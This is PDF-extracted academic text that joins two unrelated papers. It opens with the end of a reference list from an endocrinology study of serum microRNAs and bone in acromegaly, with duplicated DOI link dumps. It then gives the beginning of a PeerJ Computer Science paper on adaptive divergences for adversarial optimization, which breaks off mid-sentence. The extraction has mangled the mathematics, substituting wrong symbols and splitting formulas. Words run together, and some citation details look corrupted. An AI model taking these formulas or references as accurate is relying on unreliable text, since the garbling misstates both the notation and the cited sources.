0240-1) 14 Cao Z, Moore BT, Wang Y, Peng XH, Lappe JM, Recker RR & Xiao P. MiR-422a as a potential cellular microRNA biomarker for postmenopausal osteoporosis. PLoS ONE 2014 9 e97098. (https://doi. org/10.1371/journal.pone.0097098) 15 Li H, Wang Z, Fu Q & Zhang J. Plasma miRNA levels correlate with sensitivity to bone mineral density in postmenopausal osteoporosis patients. Biomarkers 2014 19 553–556. (https://doi.org/10.3109/1354 750X.2014.935957) 16 Bedene A, Mencej Bedrač S, Ješe L, Marc J, Vrtačnik P, Preželj J, Kocjan T, Kranjc T, Ostanek B MiR-148a the epigenetic regulator of bone homeostasis is increased in plasma of osteoporotic postmenopausal women. Wiener klinische Wochenschrift 2016 128 (Supplement 16) 519–526. (https://doi.org/10.1007/s00508-016- 1141-3) 17 Seeliger C, Karpinski K, Haug, Vester H, Schmitt A, Bauer JS & van Griensven M Five freely circulating miRNAs and bone tissue miRNAs are associated with osteoporotic fractures. Journal of Bone and Mineral Research 2014 19 553–556. (https://doi.org/10.1002/jbmr.2175) 18 Weilner S, Skalicky S, Salzer B, Keider V, Wagner F, Hildner F, Gabriel C, Dovjak P, Pietschmann P, Grillari-Voglauer R, et al. Differentially circulating miRNAs after recent osteoporotic fracture can influence osteogenic differentiation. Bone 2015 79 43–51. (https://doi. org/10.1016/j.bone.2015.05.027) 19 Panach L, Mifsut D, Tarín JJ, Cano A & Garcia-Pérez MA. Serum circulating microRNAs as biomarkers of osteoporotic fracture. Calcified Tissue International 2015 97 495–505. (https://doi. org/10.1007/s00223-015-0036-z) 20 Heilmeier U, Hackl M, Skalicky S, Weilner S, Schroeder F, Vierlinger K, Patsch JM, Baum T, Oberbauer E, Lobach I, et al. Serum miRNA Signatures are indicative of skeletal fractures in postmenopausal women with and without type 2 diabetes and influence osteogenic and adipogenic differentiation of adipose tissue-derived mesenchymal stem cells in vitro. Journal of Bone and Mineral Research 2016 31 2173–2192. (https://doi.org/10.1002/jbmr.2897) 21 Yavropoulou MP, Anastasilakis A, Makras P, Tsalikakis D, Grammatiki M & Yovos JG. Expression of microRNAs that regulate bone turnover in the serum of postmenopausal women with low bone mass and vertebral fractures. European Journal of Endocrinology 2017 176 169–176. (https://doi.org/10.1530/EJE-16-0583) 22 Belaya Z, Grebennikova T, Melnichenko GA, Nikitin A, Solodovnikov A, Brovkina A, Grigoriev A, Rozhinskaya L, Lutsenko A & Dedov LL. Effects of active acromegaly on bone mRNA and microRNA expression patterns. European Journal of Endocrinology 2018 178 353–364. (https://doi.org/10.1530/EJE-17-0772) 23 Aulinas A, Crespo I, Vilades D, Leta R, Urgell E, Biagetti B, Webb SM & Valassi E. Cystatin-C and epicardial adipose tissue as noninvasive predictors of cardiovascular risk in acromegaly. Clinical Endocrinology 2016 86 214–222. (https://doi.org/10.1111/cen.13273) 24 Giustina A, Chanson P, Bronstein MD, Klibanski A, Lamberts S, Casanueva FF, Trainer P, Ghigo E, Ho K & Melmed S. A consensus on criteria for cure of acromegaly. Journal of Clinical Endocrinology and Metabolism 2010 95 3141–3148. (https://doi.org/10.1210/jc.2009- 2670) 25 Molitch ME, Clemmons DR, Malozowski S, Merriam GR & Vance ML. Evaluation and treatment of adult growth hormone deficiency: an Endocrine Society Clinical Practice Guidelines. Journal of Clinical Endocrinology and Metabolism 2011 96 1587–1609. (https://doi. org/10.1210/jc.2011-0179) 26 Allison SJ, Poole KES, Treece GM, Gee AH, Tonkin C, Rennie WJ, Folland JP, Summers GD & Brooke-Wavell K. The influence of high impact exercise on cortical and trabecular bone mineral content and 3D distribution across the proximal femur in older men: a randomised controlled unilateral intervention. Journal of Bone and Mineral Research 2015 30 1709–1716. (https://doi.org/10.1002/jbmr.2499) 27 Zuo B, Zhu J, Li J, Wang C, Zhao X, Cai G, Li Z, Peng J, Wang P & Shen C, et al. microRNA-103a functions as a mechanosensitive microRNA to inhibit bone formation through targeting Runx2. Journal of Bone and Mineral Research 2014 30 330–345. (https://doi. org/10.1002/jbmr.2352) 28 Mao ZG, Sheng He D, Zhou J, Yao B, Xiao W, Chen CH, Zhu YH & Wang JJ. Differential expression of microRNAs in GH secreting pituitary adenomas. Diagnostic Pathology 2010 5 79. (https://doi. org/10.1186/1746-1596-5-79) 29 Blondal T, Jensby Nielsen S, Baker A, Andreasen D, Mouritzen P, Wrang Teilum M & Dahlsveen IK. Assessing sample and miRNA profile quality in serum and plasma or other biofluids. Methods 2013 59 S1–S6. (https://doi.org/10.1016/j. ymeth.2012.09.015) 30 Mazziotti G, Frara S & Giustina A. Pituitary diseases and bone. Endocrine Reviews 2018 39 440–488. (https://doi.org/10.1210/er.2018- 00005) 31 Dalle Carbonare L, Micheletti V, Cosaro E, Valenti MT, Mottes M, Francia G & Daví MV. Bone histomorphometry in acromegaly patients with fragility vertebral fractures. Pituitary 2018 21 56–64. (https://doi.org/10.1007/s11102-017-0847-1) 32 Mazziotti G, Biagioli E, Maffezzoni F, Spinello M, Serra V, Maroldi R, Floriani I & Giustina A. Bone turnover, bone mineral density, and fracture risk in acromegaly: a meta-analysis. Journal of Clinical Endocrinology and Metabolism 2015 100 384–394. (https://doi. org/10.1210/jc.2014-2937) 33 Lanzi R, Losa M, Villa I, Gatti E, Sirtori M, Dal Fiume C & Rubinacci A. GH replacement therapy increases plasma osteoprotegerin levels in GH-deficient adults. European Journal of Endocrinology 2003 148 185–191. (https://doi.org/10.1530/eje.0.1480185) 34 Constantin T, Tangpricha V, Shah R, Oyesiku NM, Ioachimescu OC, Ritchie J & Ioachimescu AG. Calcium and bone turnover markers in acromegaly: a prospective, controlled study. Journal of Clinical Endocrinology and Metabolism 2017 102 2416–2424 (https://doi. org/10.1210/jc.2016-3693) 35 De-Ugarte L, Serra-Vinardell J, Nonell L, Belcells S, Arnal M, Nogues M, Mellibovski L, Grinberg D, Diez-Perez A & García-Giralt N. Expression profiling of microRNAs in human bone tissue from postmenopausal women. Human Cell 2018 31 33–41. (https://doi. org/10.1007/s13577-017-0181-y) 36 Valenti MT, Mottes, M, Cheri S, Deiana M, Micheletti V, Corsaro E & Daví MV, Francia G & Dalle Carbonare L. Runx2 overexpression This work is licensed under a Creative Commons Attribution-NonCommercial 4.0 International License.https://doi.org/10.1530/EC-18-0482 https://ec.bioscientifica.com © 2019 The authors Published by Bioscientifica Ltd Downloaded from Bioscientifica.com at 04/06/2021 04:58:15PM via free access https://doi.org/10.1530/EJE-15-0931 https://doi.org/10.1530/EJE-15-0931 https://doi.org/10.1530/EJE-16-0808 https://doi.org/10.1210/jc.2016-2365 https://doi.org/10.1210/jc.2016-2365 https://doi.org/10.1016/j.bone.2015.05.026 https://doi.org/10.1016/j.tibs.2012.08.003 https://doi.org/10.1007/s11914-014-0240-1 https://doi.org/10.1007/s11914-014-0240-1 https://doi.org/10.1371/journal.pone.0097098 https://doi.org/10.1371/journal.pone.0097098 https://doi.org/10.3109/1354750X.2014.935957 https://doi.org/10.3109/1354750X.2014.935957 https://doi.org/10.1007/s00508-016-1141-3 https://doi.org/10.1007/s00508-016-1141-3 https://doi.org/10.1002/jbmr.2175 https://doi.org/10.1016/j.bone.2015.05.027 https://doi.org/10.1016/j.bone.2015.05.027 https://doi.org/10.1007/s00223-015-0036-z https://doi.org/10.1007/s00223-015-0036-z https://doi.org/10.1002/jbmr.2897 https://doi.org/10.1530/EJE-16-0583 https://doi.org/10.1530/EJE-17-0772 https://doi.org/10.1111/cen.13273 https://doi.org/10.1210/jc.2009-2670 https://doi.org/10.1210/jc.2009-2670 https://doi.org/10.1210/jc.2011-0179 https://doi.org/10.1210/jc.2011-0179 https://doi.org/10.1002/jbmr.2499 https://doi.org/10.1002/jbmr.2352 https://doi.org/10.1002/jbmr.2352 https://doi.org/10.1186/1746-1596-5-79 https://doi.org/10.1186/1746-1596-5-79 https://doi.org/10.1016/j.ymeth.2012.09.015 https://doi.org/10.1016/j.ymeth.2012.09.015 https://doi.org/10.1210/er.2018-00005 https://doi.org/10.1210/er.2018-00005 https://doi.org/10.1007/s11102-017-0847-1 https://doi.org/10.1210/jc.2014-2937 https://doi.org/10.1210/jc.2014-2937 https://doi.org/10.1530/eje.0.1480185 https://doi.org/10.1210/jc.2016-3693 https://doi.org/10.1210/jc.2016-3693 https://doi.org/10.1007/s13577-017-0181-y https://doi.org/10.1007/s13577-017-0181-y https://creativecommons.org/licenses/by-nc/4.0/ https://creativecommons.org/licenses/by-nc/4.0/ https://doi.org/10.1530/EC-18-0482 https://ec.bioscientifica.com E Valassi et al. miRNAs and bone in acromegaly 498:1 compromises bonr quality in acromegaly. Endocrine-Related Cancer 2018 25 269–277. (https://doi.org/10.1530/ERC-17-0523) 37 Komori T, Yagi H, Nomura S, Yamaguchi A, Sasaki K, Deguchi K, Shimizu Y, Bronson RT, Gao YH, Inada M, et al. Targeted disruption of Cbfa1 results in a complete lack of bone formation owing to maturational arrest of osteoblasts. Cell 1997 89 755–765. (https://doi. org/10.1016/S0092-8674(00)80258-5) 38 Cohen MM Jr. Perspectives on RUNX genes: an update. American Journal of Medical Genetics Part A 2009 149 2629–2646. (https://doi. org/10.1002/ajmg.a.33021) 39 Godang K, Olarescu NC, Bollerslev J & Heck A. Treatment of acromegaly increases BMD but reduced trabecular bone score: a longitudinal study. European Journal of Endocrinology 2016 175 155–164. (https://doi.org/10.1530/EJE-16-0340) 40 Shah R, Licata A, Oyesiku NM & Ioachimescu AG. Acromegaly as a cause of 1,15-dihydroxyvitamin D-dependent hypercalcemia: case reports and review of the literature. Pituitary 2012 15 S17–S22. (https://doi.org/10.1007/s11102-010-0286-8) 41 Valassi E, Crespo I, Malouf J, Vilades D, Leta R, Llauger J, Urgell E, Aulinas A, Marin AM, Biagetti B, et al. Epicardial fat is a negative predictor of spine volumetric bone mineral density and trabecular bone score in acromegaly. Endocrine 2016 53 860–864. (https://doi. org/10.1007/s12020-016-0945-2) 42 Giustina A, Chanson P, Kleinberg D, Bronstein MD, Clemmons DR, Klibanski A, van der Lely AJ, Strasburger CJ, Lamberts SW, Ho KKY, et al. Expert consensus document: a consensus on the medical treatment of acromegaly. Nature Reviews Endocrinology 2014 10 243–248. (https://doi.org/10.1038/ nrendo.2014.21) 43 Biermasz NR, Hamdy NAT, Pereira AM, Romijn JA & Roelfesma F. Long-term maintenance of the anabolic effects of GH on the skeleton in successfully treated patients with acromegaly. European Journal of Endocrinology 2005 152 53–60. (https://doi.org/10.1530/ eje.1.01820) 44 Melmed S, Colao A, Barkan A, Molitch M, Grossman AB, Kleinberg D, Clemmons D, Chanson P, Laws E, Schlechte J, et al. Guideline for acromegaly management. An update. Journal of Clinical Endocrinology and Metabolism 2009 94 1509–1517. (https://doi.org/10.1210/ jc.2008-2421) 45 Zhang JX, Song W, Chen ZH, Wei JH, Liao YJ, Lei J, Hu M, Chen GZ, Liao B, Lu J, et al. Prognostic and predictive value of a microRNA signature in stage II colon cancer: a microRNA expression analysis. Lancet Oncology 2013 14 1295–1236. (https://doi.org/10.1016/S1470- 2045(13)70491-1) 46 Fasihi A, Soltani BM, Atashi A & Nasiri S. Introduction of hsa-miR- 103a and hsa-miR-1827 and hsa-miR-137 as new regulators of Wnt signaling pathway and their relation to colorectal carcinoma. Journal of Cell Biochemistry 2018 119 5104–5117. (https://doi.org/10.1002/jcb.26357) 47 Shen Y, Ye YF, Ruan LW, Bao L, Wu MW & Zhou Y. Inhibition of miR- 660-5p expression suppresses tumor development and metastasis in human breast cancer. Genetics and Molecular Research 2017 23 16. (https://doi.org/10.4238/gmr16019479) 48 Bye A, Røsjø H, Nauman J, Silva GJ, Follestad T, Omland T & Wisløff U. Circulating microRNAs predict future fatal myocardial infarction in healthy individuals – The HUNT study. Journal of Molecular and Cellular Cardiology 2016 97 162–168. (https://doi.org/10.1016/j. yjmcc.2016.05.009) 49 Jakob P, Kacprowski T, Briand-Schumacher S, Heg D, Klingenberg R, Stähli BE, Jaguszewski M, Rodondi N, Nanchen D, Räber L, et al. Profiling and validation of circulating microRNAs for cardiovascular events in patients presenting with ST-segment elevation myocardial infarction. European Heart Journal 2017 38 511–515. (https://doi. org/10.1093/eurheartj/ehw563) 50 Chen P, Pan X, Zhao L, Jin L, Lin C, Quan J, He T, Zhou L, Wu X, Wang Y, et al. MicroRNA-191-5p exerts a tumor suppressive role in renal cell carcinoma. Experimental and Therapeutic Medicine 2018 15 1686–1693. (https://doi.org/10.3892/etm.2017.5581) Received in final form 18 December 2018 Accepted 21 December 2018 Accepted Preprint published online 21 December 2018 This work is licensed under a Creative Commons Attribution-NonCommercial 4.0 International License.https://doi.org/10.1530/EC-18-0482 https://ec.bioscientifica.com © 2019 The authors Published by Bioscientifica Ltd Downloaded from Bioscientifica.com at 04/06/2021 04:58:15PM via free access https://doi.org/10.1530/ERC-17-0523 https://doi.org/10.1016/S0092-8674(00)80258-5 https://doi.org/10.1016/S0092-8674(00)80258-5 https://doi.org/10.1002/ajmg.a.33021 https://doi.org/10.1002/ajmg.a.33021 https://doi.org/10.1530/EJE-16-0340 https://doi.org/10.1007/s11102-010-0286-8 https://doi.org/10.1007/s12020-016-0945-2 https://doi.org/10.1007/s12020-016-0945-2 https://doi.org/10.1038/nrendo.2014.21 https://doi.org/10.1038/nrendo.2014.21 https://doi.org/10.1530/eje.1.01820 https://doi.org/10.1530/eje.1.01820 https://doi.org/10.1210/jc.2008-2421 https://doi.org/10.1210/jc.2008-2421 https://doi.org/10.1016/S1470-2045(13)70491-1 https://doi.org/10.1016/S1470-2045(13)70491-1 https://doi.org/10.1002/jcb.26357 https://doi.org/10.4238/gmr16019479 https://doi.org/10.4238/gmr16019479 https://doi.org/10.1016/j.yjmcc.2016.05.009 https://doi.org/10.1016/j.yjmcc.2016.05.009 https://doi.org/10.1093/eurheartj/ehw563 https://doi.org/10.1093/eurheartj/ehw563 https://doi.org/10.3892/etm.2017.5581 https://creativecommons.org/licenses/by-nc/4.0/ https://creativecommons.org/licenses/by-nc/4.0/ https://doi.org/10.1530/EC-18-0482 https://ec.bioscientifica.com Abstract Subjects and methods Subjects Biochemical measurements Radiological imaging miRNA isolation from serum samples miRNA selection MicroRNA real-time qPCR Hemolysis assessment Statistical analysis Results Clinical characteristics and bone parameters Differentially expressed microRNAs ACRO vs controls Relationship between serum miRNAs and bone parameters Discussion Supplementary data Declaration of interest Funding Acknowledgement References work_o5yf5ggv6nefzovxdmf5l4n2iu ---- Submitted 13 November 2019 Accepted 13 April 2020 Published 18 May 2020 Corresponding author Maxim Borisyak, mborisyak@hse.ru Academic editor Charles Elkan Additional Information and Declarations can be found on page 21 DOI 10.7717/peerj-cs.274 Copyright 2020 Borisyak et al. Distributed under Creative Commons CC-BY 4.0 OPEN ACCESS Adaptive divergence for rapid adversarial optimization Maxim Borisyak1, Tatiana Gaintseva1 and Andrey Ustyuzhanin1,2 1 Laboratory of Methods for Big Data Analysis, National Research University Higher School of Economics, Moscow, Russia 2 Physics Department, Imperial College, London, United Kingdom ABSTRACT Adversarial Optimization provides a reliable, practical way to match two implicitly defined distributions, one of which is typically represented by a sample of real data, and the other is represented by a parameterized generator. Matching of the distributions is achieved by minimizing a divergence between these distribution, and estimation of the divergence involves a secondary optimization task, which, typically, requires training a model todiscriminate betweenthese distributions. Thechoice ofthe modelhas itstrade- off: high-capacity models provide good estimations of the divergence, but, generally, require large sample sizes to be properly trained. In contrast, low-capacity models tend to require fewer samples for training; however, they might provide biased estimations. Computational costs of Adversarial Optimization becomes significant when sampling from the generator is expensive. One of the practical examples of such settings is fine- tuning parameters of complex computer simulations. In this work, we introduce a novel family of divergences that enables faster optimization convergence measured by the number of samples drawn from the generator. The variation of the underlying discriminator model capacity during optimization leads to a significant speed-up. The proposed divergence family suggests using low-capacity models to compare distant distributions (typically, at early optimization steps), and the capacity gradually grows as the distributions become closer to each other. Thus, it allows for a significant acceleration of the initial stages of optimization. This acceleration was demonstrated on two fine-tuning problems involving Pythia event generator and two of the most popular black-box optimization algorithms: Bayesian Optimization and Variational Optimization. Experiments show that, given the same budget, adaptive divergences yield results up to an order of magnitude closer to the optimum than Jensen-Shannon divergence. While we consider physics-related simulations, adaptive divergences can be applied to any stochastic simulation. Subjects Data Mining and Machine Learning, Optimization Theory and Computation, Scientific Computing and Simulation Keywords Adversarial optimization, Black-box optimization, Computer simulations INTRODUCTION Adversarial Optimization (AO), introduced in Generative Adversarial Networks (Good- fellow et al., 2014), became popular in many areas of machine learning and beyond with applications ranging from generative (Radford, Metz & Chintala, 2015) and inference How to cite this article Borisyak M, Gaintseva T, Ustyuzhanin A. 2020. Adaptive divergence for rapid adversarial optimization. PeerJ Comput. Sci. 6:e274 http://doi.org/10.7717/peerj-cs.274 https://peerj.com/computer-science mailto:mborisyak@hse.ru https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.274 http://creativecommons.org/licenses/by/4.0/ http://creativecommons.org/licenses/by/4.0/ http://doi.org/10.7717/peerj-cs.274 1For instance, compare training times, network capacities and computational resources reported by Simonyan & Zisserman (2014) and Choi et al. (2018). 2There are ways to estimate gradients of such programs, for example, see (Baydin et al., 2019). However, all methods known to the authors require training a surrogate, which encounters the problem of the expensive sampling procedures mentioned above. tasks (Dumoulin et al., 2016), improving image quality (Isola et al., 2017) to tuning stochastic computer simulations (Louppe, Hermans & Cranmer, 2017). AO provides a reliable, practical way to match two implicitly defined distributions, one of which is typically represented by a sample of real data, and the other is represented by a parameterized generator. Matching of the distributions is achieved by minimizing a divergence between these distribution, and estimation of the divergence involves a secondary optimization task, which, typically, requires training a model to discriminate between these distributions. The model is referred to as discriminator or critic (for simplicity, we use term discriminator everywhere below). Training a high-capacity model, however, is computationally expensive (Metz et al., 2016) as each step of divergence minimization is accompanied by fitting the discriminator; therefore, adversarial training often requires significantly more computational resources than, for example, a classification model with a comparable architecture of the networks.1 Nevertheless, in conventional settings like GAN, this problem is not pronounced for at least two reasons. Firstly, the generator is usually represented by a deep neural network, and sampling is computationally cheap; thus, for properly training the discriminator, a sample of a sufficient size can be quickly drawn. Secondly, GAN training procedures are often regarded not as minimization of a divergence, but as game-like dynamics (Li et al., 2017; Mescheder, Geiger & Nowozin, 2018); such dynamics typically employ gradient optimization with small incremental steps, which involve relatively small sample sizes for adapting the previous discriminator to an updated generator configuration. Computational costs of AO become significant when sampling from the generator is computationally expensive, or optimization procedure does not operate by performing small incremental steps (Metz et al., 2016). One of the practical examples of such settings is fine-tuning parameters of complex computer simulations. Such simulators are usually based on physics laws expressed in computational mathematical forms like differential or stochastic equations. Those equations relate input or initial conditions to the observable quantities under conditions of parameters that define physics laws, geometry, or other valuable property of the simulation; these parameters do not depend on inputs or initial conditions. It is not uncommon that such simulations have very high computational complexity. For example, the simulation of a single proton collision event in the CERN ATLAS detector takes several minutes on a single core CPU (The ATLAS Collaboration, 2010). Due to typically high dimensionality, it takes a considerable amount of samples for fine-tuning, which in turn increases the computational burden. Another essential property of such computer simulations is the lack of gradient information over the simulation parameters. Computations are represented by sophisticated computer programs, which are challenging to differentiate.2 Thus, global black-box optimization methods are often employed; Bayesian Optimization is one of the most popular approaches. In this work, we introduce a novel family of divergences that enables faster optimization convergence measured by the number of samples drawn from the generator. The variation of the underlying discriminator model capacity during optimization leads to a significant speed-up. The proposed divergence family suggests using low-capacity models to compare Borisyak et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.274 2/24 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.274 distant distributions (typically, at early optimization steps), and the capacity gradually grows as the distributions become closer to each other. Thus, it allows for a significant acceleration of the initial stages of optimization. Additionally, the proposed family of divergences is broad, which offers a wide range of opportunities for further research. We demonstrate the basic idea with some toy examples, and with a realistic challenge of tuning Pythia event generator (Sjöstrand, Mrenna & Skands, 2006; Sjostrand et al., 2015) following Louppe, Hermans & Cranmer (2017) and Ilten, Williams & Yang (2017). We consider physics-related simulations; nevertheless, all proposed methods are simulation- agnostic. BACKGROUND Adversarial Optimization, initially introduced for Generative Adversarial Networks (GAN) (Goodfellow et al., 2014), offers a general strategy for matching two distributions. Consider feature space X , ground-truth distribution P, and parametrized family of distributions Qψ implicitly defined by a generator with parameters ψ. Formally, we wish to find such ψ∗, that P =Qψ∗ almost everywhere. AO achieves that by minimizing a divergence or a distance between P and Qψ with respect to ψ. One of the most popular divergences is Jensen–Shannon divergence: JSD(P,Qψ)= 1 2 [ KL(P‖Mψ)+KL(Qψ‖Mψ) ] = 1 2 E x∼P log P(x) Mψ(x) + 1 2 E x∼Qψ log Q(x) Mψ(x) ; (1) where: KL —Kullback–Leibler divergence, Mψ(x)= 1 2 ( P(x)+Qψ(x) ) . The main insight of Goodfellow et al. (2014) is that JSD can be estimated by training a discriminator f to distinguish between P and Qψ: log2−min f∈F L(f ,P,Qψ)= log2−min f∈F { − 1 2 E x∼P log ( f (x) ) − 1 2 E x∼Qψ log ( 1−f (x) )} = log2+ { 1 2 E x∼P log ( f ∗(x) ) + 1 2 E x∼Qψ log ( 1−f ∗(x) )} = log2+ { 1 2 E x∼P log P(x) Qψ(x)+P(x) + 1 2 E x∼Qψ log Qψ(x) Qψ(x)+P(x) } = 1 2 E x∼P log P(x) Mψ(x) + 1 2 E x∼Qψ log Q(x) Mψ(x) = JSD(P,Qψ); (2) where: L —cross-entropy loss function, F ={f :X →[0,1]} is the set of all possible discriminators, and f ∗ is the optimal discriminator. Similar formulations also exist for other divergences such as Wasserstein (Arjovsky, Chintala & Bottou, 2017) and Cramer (Bellemare et al., 2017) distances. In classical GAN, both generator and discriminator are represented by differentiable neural networks. Hence, a subgradient of JSD(P,Qψ) can be easily computed (Goodfellow Borisyak et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.274 3/24 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.274 et al., 2014). The minimization of the divergence can be performed by a gradient method, and the optimization procedure goes iteratively following those steps: • using parameters of the discriminator from the previous iteration as an initial guess, adjust f by performing several steps of the gradient descent to minimize L(f ,P,Qψ); • considering f as a constant, compute the gradient of L(f ,P,Qψ) w.r.t. ψ, perform one step of the gradient ascent. For computationally heavy generators, gradients are usually practically unfeasible; therefore, we consider black-box optimization methods. One of the most promising methods for black-box AO is Adversarial Variational Optimization (Louppe, Hermans & Cranmer, 2017), which combines AO with Variational Optimization (Wierstra et al., 2014). This method improves upon conventional Variational Optimization (VO) over Jensen–Shannon divergence by training a single discriminator to distinguish samples from ground-truth distribution and samples from a mixture of generators, where the mixture is defined by the search distribution of VO. This eliminates the need to train a classifier for each individual set of parameters drawn from the search distribution. Bayesian Optimization (BO) (Mockus, 2012) is another commonly used black-box optimization method, with applications including tuning of complex simulations (Ilten, Williams & Yang, 2017). As we demonstrate in ‘Experiments, BO can be successfully applied for Adversarial Optimization. ADAPTIVE DIVERGENCE Notice, that in equation Eq. (2) minimization is carried over the set of all possible discriminators F ={f : X 7→ [0,1]}. In practice, this is intractable and set F is approximated by a model such as Deep Neural Networks. Everywhere below, we use terms ‘low-capacity’ and ‘high-capacity’ to describe the set of feasible discriminator functions: low-capacity models are either represent a narrow set of functions (e.g., logistic regression, shallow decision trees) or are heavily regularized (see ‘Implementation’ for more examples of capacity regulation); high-capacity models are sufficient for estimating JSD for an Adversarial Optimization problem under consideration. In conventional GAN settings, the generator is represented by a neural network, sampling is computationally cheap, and usage of high-capacity discriminators is satisfactory. In our case, as was discussed above, simulations tend to be computationally heavy, which, combined with a typically slow convergence of black-box optimization algorithms, might make AO with a high-capacity model practically intractable. The choice of the model has its trade-off: high-capacity models provide good estimations of JSD, but, generally, require large sample sizes to be properly trained. In contrast, low- capacity models tend to require fewer samples for training; however, they might provide biased estimations. For example, if the classifier is represented by a narrow set of functions M ⊆F, then quantity: DM(P,Q)= log2−min f∈M L(f ,P,Q); (3) Borisyak et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.274 4/24 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.274 might no longer be a divergence, so we refer to it as pseudo-divergence. Definition 1 A function D :5(X)×5(X)→R is a pseudo-divergence, if : (P1) ∀P,Q∈5(X) :D(P,Q)≥0; (P2) ∀P,Q ∈5(X) : (P = Q) ⇒ D(P,Q) = 0; where 5(X) —set of all probability distributions on space X . It is tempting to use a pseudo-divergence DM produced by a low-capacity model M for Adversarial Optimization, however, a pseudo-divergence might not guarantee proper convergence as there might exist such ψ ∈9, that JSD(P,Qψ) > 0, while D(P,Qψ)=0. For example, naive Bayes classifier is unable to distinguish between P and Q that have the same marginal distributions. Nevertheless, if model M is capable of distinguishing between P and some Qψ, DM still provides information about the position of the optimal parameters in the configuration space ψ∗ by narrowing search volume, Ilten, Williams & Yang (2017) offers a good demonstration of this statement. The core idea of this work is to replace Jensen–Shannon divergence with a so-called adaptive divergence that gradually adjusts model capacity depending on the ‘difficulty’ of the classification problem with the most ‘difficult’ problem being distinguishing between two equal distributions. Formally, this gradual increase in model complexity can be captured by the following definitions. Definition 2 A family of pseudo-divergences D={Dα :5(X)×5(X)→R|α∈[0,1]} is ordered and complete with respect to Jensen–Shannon divergence if : (D0) Dα is a pseudo-divergence for all α∈[0,1]; (D1) ∀P,Q∈5(X) :∀0≤α1 <α2≤1 :Dα1(P,Q)≤Dα2(P,Q); (D2) ∀P,Q∈5(X) :D1(P,Q)= JSD(P,Q). There are numerous ways to construct a complete and ordered w.r.t. JSD family of pseudo-divergences. In the context of Adversarial Optimization, we consider the following three methods. The simplest one is to define a nested family of models M={Mα⊆F|α∈[0,1]}, (e.g., by changing number of hidden units of a neural network), then use pseudo-divergence Eq. (3) to form a desired family. Alternatively, for a parameterized model M ={f (θ,·)|θ ∈2}, one can use a regularization R(θ) to control ‘capacity’ of the model: Dα(P,Q)= log2−L(f (θ ∗ ,·),P,Q); (4) θ ∗ = arg minθ∈2L(f (θ,·),P,Q)+c(1−α)·R(θ); where c : [0,1]→[0,+∞) is a strictly increasing function and c(0)=0. The third, boosting-based method is applicable for a discrete approximation: Dc(i)(P,Q)= log2−L(Fi,P,Q); (5) Fi =Fi−1+ρ ·arg minf∈BL(Fi−1+f ,P,Q); F0 ≡ 1 2 ; where: ρ —learning rate, B —base estimator, c :Z+→[0,1] —a strictly increasing function for mapping ensemble size onto α∈[0,1]. Borisyak et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.274 5/24 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.274 Although Definition 2 is quite general, in this paper, we focus on families of pseudo- divergence produced in a manner similar to the examples above. All these examples introduce a classification algorithm parameterized by α, then define pseudo-divergences Dα by substituting the optimal discriminator in Equation Eq. (2) with the discriminator trained in accordance with this classification algorithm with the parameter α. Of course, one has to make sure that the resulting family of pseudo-divergences is ordered and complete w.r.t. Jensen–Shannon divergence. appendix provides formal definitions and proofs for the examples above. With this class of pseudo-divergences in mind, we refer to α as capacity of the pseudo- divergence Dα ∈D relative to the family D, or simply as capacity if the family D is clear from the context. In the examples above, capacity of pseudo-divergence is directly linked to the capacity of underlying discriminator models: to the size of the model in equation Eq. (3), to the strength of the regularization in equation Eq. (4) (which, similar to the previous case, effectively restricts the size of the set of feasible models) or to the size of the ensemble for a boosting-based family of divergences in equation Eq. (5). Finally, we introduce a function that combines a family of pseudo-divergences into a single divergence. Definition 3 If a family of pseudo-divergences D={Dα|α∈[0,1]} is ordered and complete with respect to Jensen–Shannon divergence, then adaptive divergence ADD produced by D is defined as: ADD(P,Q)= inf { Dα(P,Q)|Dα(P,Q)≥(1−α)log2 } . (6) We omit index in ADD when the family D is clear from the context or is not important. A linear ‘threshold’ function τ(α)=1−α is used in the definition, however, it can be replaced by any strictly decreasing τ : [0,1]→[0,1], such that τ(0)=1 and τ(1)=0: ADD(P,Q)= inf { Dα(P,Q)|Dα(P,Q)≥τ(α)log2 } , (7) but, since one can redefine the family D as D′={Dτ(α)|α∈[0,1]}, this effectively leads to the same definition. Nevertheless, it might be convenient in practice to use τ other than τ(α)=1−α as most model families have a natural ordering, e.g., regularization strength. The coefficient log2 naturally arises as the maximal value of Jensen–Shannon divergence as well as an upper bound of any pseudo-divergence based on equation Eq. (3) if the function f0(x)=1/2 is included in the underlying classification model M. Since almost all popular models are capable of learning constant estimators, log2 is included in the definition. Nevertheless, to adopt Definition 3 for exotic models or divergences other than Jensen–Shannon (e.g., Wasserstein distance), this coefficient (and, possibly, the ‘threshold’ function) should be reconsidered. Note, that due to property (D1), Dα(P,Q) is a non-decreasing function of α, while (1−α)log2 is a strictly decreasing one. Hence, if family D is such that for any two distributions P and Q Dα(P,Q) is continuous w.r.t. α, equation Eq. (6) can be simplified: ADD(P,Q)=Dα∗(P,Q), (8) Borisyak et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.274 6/24 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.274 Algorithm 1 General procedure for computing an adaptive divergence by grid search Require: D={Dα|α∈[0,1]}— ordered and complete w.r.t. Jensen-Shannon divergence family of pseudo-divergences; ε — tolerance; P, Q — input distributions α←0; while Dα(P,Q)<(1−α)log2 do α←α+ε end while return Dα(P,Q) where α∗ is the root of the following equation: Dα(P,Q)=(1−α)log2. (9) A general procedure for computing ADD for this case is outlined in Algorithm 1. Intuitively, an adaptive divergence ADD switches between members of D depending on the ‘difficulty’ of separating P and Q. For example, consider family D produced by equation Eq. (4) with a high-capacity neural network as model M and l2 regularization R on its weights. For a pair of distant P and Q, even a highly regularized network is capable of achieving low cross-entropy loss and, therefore, ADD takes values of the pseudo-divergence based on such network. As distribution Q moves close to P, ADD lowers the regularization coefficient, effectively increasing the capacity of the underlying model. The idea behind adaptive divergences can be viewed from a different angle. Given two distributions P and Q, it scans the producing family of pseudo-divergences, starting from α=0 (the least powerful pseudo-divergence), and if some pseudo-divergence 